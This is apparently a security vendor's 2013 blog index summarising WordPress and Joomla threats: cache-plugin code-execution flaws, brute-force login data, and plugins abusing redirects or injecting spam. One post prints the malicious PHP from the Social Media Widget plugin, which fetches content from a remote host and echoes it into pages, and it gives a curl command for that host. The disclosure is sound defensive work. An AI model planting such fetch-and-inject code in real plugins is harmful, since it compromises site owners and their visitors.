Update WP Super Cache and W3TC Immediately – Remote Code Execution Vulnerability Disclosed

April 23, 2013 by 47 Comments

Shame on us for not catching this a month ago when it was first reported, but it seems that two of the biggest caching plugins in WordPress have what we would classify a very serious vulnerability – remote code execution (RCE), a.k.a., arbitrary code execution:

…arbitrary code execution is used to describe an attacker’s ability to execute any commands of the attacker’s choice on a target machine or in a target process. – Wikipedia

It appears that a user by the name of kisscsaby first disclosed the issue a month ago via the WordPress forums. As of 5 days ago both plugin authors have pushed new versions of their plugins disabling the vulnerable functions by default. The real concern however is the seriousness of the vulnerability and the shear volume of users between both plugins.

There are a few posts, released within the past few hours that do a great job of explaining what the issue was and what was being exploited. You can find some good after action thoughts on Frank Goosens’ blog and on Acunetix’s blog as well.

Why Such a Big Deal?


Read More

Filed Under: awareness, security, sucuri, vulnerability, WordPress Tagged With: , , , , ,

The WordPress Brute Force Attack Timeline

April 16, 2013 by 18 Comments

Authored by Daniel Cid, Tony Perez.

We have been blogging about the massive brute force attacks against WordPress websites over the past few days, today we want to provide better context of the scale by sharing some more data on what we saw and continue to see.

In our previous report, we said that the number of scans detected almost tripled from the old averages, increasing from around 30,000 scans per day to around 100,000 per day in April.

However, the numbers are a lot larger than that. We compiled the averages per day again and on Thursday (April 11), the number of scans increased to more than 1,000,000 scans, which is more 30x the averages. This is the compilation per day:

Read More

Filed Under: botnet, sucuri, WordPress Tagged With: , ,

WordPress Malicious Plugin – WPPPM – Abusing 404 Redirects with SEO Poisoning

April 13, 2013 by 12 Comments

Bruno Borges, of our security team, came across an interesting case this week, in which a WordPress plugin was abusing the 404 rewrite rules and redirecting all traffic to SPAM pages advertising a variety of things, the most common being:

FACTUAL STUDY: HYDROXYCITRIC ACID IN GARCINIA CAMBOGIA BURNS FAT.

The way it works is interesting, by default most would never realize they are even infected. The plugin is designed only to redirect incoming traffic that accidentally goes to a page that doesn’t exist. In most cases it would generates what we know as 404 pages, or state something like, Sorry this page doesn’t exist, etc… Well in this case, you’d be greeted with something like the following:

Read More

Filed Under: Malware, malware cleanup, plugins, Spam, sucuri, WordPress Tagged With: , , , , , ,

Mass WordPress Brute Force Attacks? – Myth or Reality

April 12, 2013 by 40 Comments

We are seeing in the media some noise about a large distributed brute force attacks against all hosts targeting WordPress sites. According to reports, they are seeing a large botnet with more than 90,000 servers attempting to log in by cycling different usernames and passwords against the WordPress access points: /wp-login.php and /wp-admin.

This got us thinking, well we block a lot of attacks why not look at the logs to see what they tell us. So we did.

The Data

Looking back, we can see in our historical database the following:

2012/Dec: 678,519 login attempts blocked

2013/Jan: 1,252,308 login attempts blocked (40k per day)

2013/Feb: 1,034,323 login attempts blocked (36k per day)

2013/Mar: 950,389 login attempts blocked (31k per day)

2013/Apr: 774,104 for the first 10 days – 77,410 per day


Read More

Filed Under: hacked, Malware, malware_updates, vulnerability, WordPress Tagged With: , , , ,

When Good Plugins Go Bad – SEO Spam on Joomla Websites

April 10, 2013 by 3 Comments

We recently published an article about an interesting case where a very popular WordPress Plugin (Social Media Widget), with more than 900,000 downloads, got sold and the new owners decided to use their big audience and inject spam on all the sites using the plugin.

If you read the post, you will see how they went about injecting those “pay day loan” SPAM links to paydaypam.co.uk. What’s even more scary is that in one day, the number of backlinks to paydaypam.co.uk, increased from 0 to almost 450k, according to ahrefs.com:

Loan Spam

This gives you an idea of how big a targeted SEO Spam attack can be.


Read More

Filed Under: joomla, Malware, malware_updates, Spam, WordPress Tagged With: , , , ,

WordPress Plugin Social Media Widget Hiding Spam – Remove it now

April 9, 2013 by 38 Comments

Authored by Daniel Cid and Tony Perez.

If you are using the Social Media Widget plugin (social-media-widget), make sure to remove it immediately from your website. We discovered it is being used to inject spam into websites and it has also been removed from the WordPress Plugin repository.

This is a very popular plugin with more than 900,000 downloads. It has the potential to impact a lot of websites.

Screen Shot 2013-04-09 at 11.03.12 AM

Technical details

The plugin has a hidden call to this URL: httx://i.aaur.net/i.php, which is used to inject “Pay Day Loan” spam into the web sites running the plugin. This is how it looks like in the browser:

function nemoViewState( ){
var a=0,m,v,t,z,x=new …
<p class="nemonn"><a href="httx://paydaypam.co. uk/" title="Payday Loan">payday loans

The malicious code was added only 12 days ago when they launched the version 4.0 of the plugin. So we are recommending that everyone removes that plugin immediately until we have more information. Our free SiteCheck scanner does identify if your site has been injected with this type of SPAM.

This is the code that was added to the plugin:

470
471 $smw_url = "hxxp://i.aaur.net/i.php";
472 if(!function_exists("smw_get")){
473 function smw_get($f) {
474 $response = wp_remote_get( $f );
475 if( is_wp_error( $response ) ) {
476 function smw_get_body($f) {
477 $ch = @curl_init();
478 @curl_setopt($ch, CURLOPT_URL, $f);
479 @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
480 $output = @curl_exec($ch);
481 @curl_close($ch);
482 return $output;
483 }
484 echo smw_get_body($f);
485 } else {
486 echo $response["body"];
487 }
488 }
489 smw_get($smw_url);
490 }

The code itself is very simply. You can see where they are pulling the malicious url on line 471. The rest is just error handling and embedding the injection.

In fact, if you want to try it safely, simply open your friendly terminal and run:

curl -D – hxxp://i.aaur.net/i.php

You’ll get something like this:

Screen Shot 2013-04-09 at 10.29.13 AM

You can clearly see the injection and in return the SPAM being injected. Now in this case you’re only seeing the injection, but once this is embedded in your website it’ll hide itself amongst all your other code, making it all that harder for you as a website owner to find. But exceptionally easy for search engines, like Google to flag.

The Real Concern

What is really concerning about this, isn’t even the SPAM injection. That happens all the time, it’s the fact that the malicious payload found it’s way in the core files. It was then uploaded to the WordPress.org Plugin Repository.

You can see what they did by looking at their changes:

This is version 4.0:
http://plugins.trac.wordpress.org/changeset?reponame=&new=688632%40social-media-widget%2Ftrunk%2Fsocial-widget.php&old=676169%40social-media-widget%2Ftrunk%2Fsocial-widget.php

They then updated 4.0, to better streamline the code:
http://plugins.trac.wordpress.org/changeset?reponame=&new=691839%40social-media-widget%2Ftrunk%2Fsocial-widget.php&old=688632%40social-media-widget%2Ftrunk%2Fsocial-widget.php

Then 17 hours ago it was removed: http://plugins.trac.wordpress.org/changeset?reponame=&new=693941%40social-media-widget%2Ftrunk%2Fsocial-widget.php&old=691839%40social-media-widget%2Ftrunk%2Fsocial-widget.php

It was likely Otto that removed it based on his response in the forums:

We forced an update to remove the discovered malware from already existing sites, however I highly recommend that you find another plugin.

So what does this tell us?

Well we know it’s not a vulnerability in the code, it’s an intentional injection, designed to compromise thousands. Very intelligent, but the question is by who.

First, the attacker is doing this directly to the core of the plugin. So, either it’s the author, or his credentials are compromised. Being that it was injected then modified it’s probably safe to say someone has access and they are not doing very nice things with it.

Second, kudos to the core team on finding and resolving the issue. It does however make you sit back and wonder, is this one isolated incident or is the going to be the new attack vector? If it’s the latter it causes grave concern, again demonstrating that the biggest vulnerability we all suffer is ourselves and our access.

Filed Under: plugins, Spam, WordPress Tagged With: , ,

WordPress Security Presentation by Tony Perez

April 4, 2013 by 1 Comment

Tomorrow I will be flying to my hometown (Miami) to give a Website Security presentation to a bunch of enthusiastic online professionals at an event called WordCamp. If you’re not familiar with these events, they are global events put together by the local populace to focus on a specific platform – WordPress. The event is called WordCamp Miami 2013, if you plan to be there definitely look me up.

I will be presenting at 1400 (EST), also known as 2:00 pm to most.

I will be volunteering at the Happiness Bar right after my talk at 1445 (EST), 2:45 pm.

If you’re interested, they are going to be live-streaming the event and you’re more than welcome to watch.

Filed Under: awareness, presentation, sucuri, WordPress Tagged With: , , , , ,

WordPress Plugin: Easy Digital Downloads – Security Flaw Discovered and Patched

February 15, 2013 by 6 Comments

Last night we were contacted by Adam Pickering about a security flaw discovered in Easy Digital Downloads (EDD), a free WordPress eCommerce plugin that allows you to sell digital downloads. If you use EDD and haven’t done so already, please make sure to upgrade to Version 1.4.4.2 immediately!

The plugin author, Pippin Williamson received word about the flaw within hours of it being validated, and had a patched version up on the WordPress Plugin Directory within the hour.

Read More

Filed Under: plugins, sucuri, vulnerability, WordPress Tagged With: , , , , ,

Dre Armeda Presenting on WordPress Security at WordCamp Phoenix 2013

February 1, 2013 by 2 Comments

Here is the video for the WordPress Security presentation at WordCamp Phoenix 2013:

Here is the slide deck from the presentation:

Leave us your comments below.

Filed Under: awareness, education, presentation, sucuri, videos, WordPress Tagged With: , , , , , ,

WordPress Security: 5 Steps To Reduce Your Risk

January 25, 2013 by 10 Comments

Often you hear the question, “What plugins should I use for WordPress Security?”. It’s a valid question, but I don’t think it’s the best approach if it’s the only question you’re asking, or the only action you’re taking. If you’re leaving the security of your blog to a plugin from a 3rd party alone, you’re doing it wrong!

WordPress-Security-Reduce-Risk-With-Less-Plugins
Risk reduction is the name of the game. A collective set of actions, tools, and processes all helping lower the risk of exploitation.

It’s Everyone’s Responsibility!

It starts with you. Follow these steps and you lower your risk floor significantly (without the use of a lot of plugins!):


Read More

Filed Under: Learn, plugins, security, sucuri, WordPress Tagged With: , , ,
«Older Posts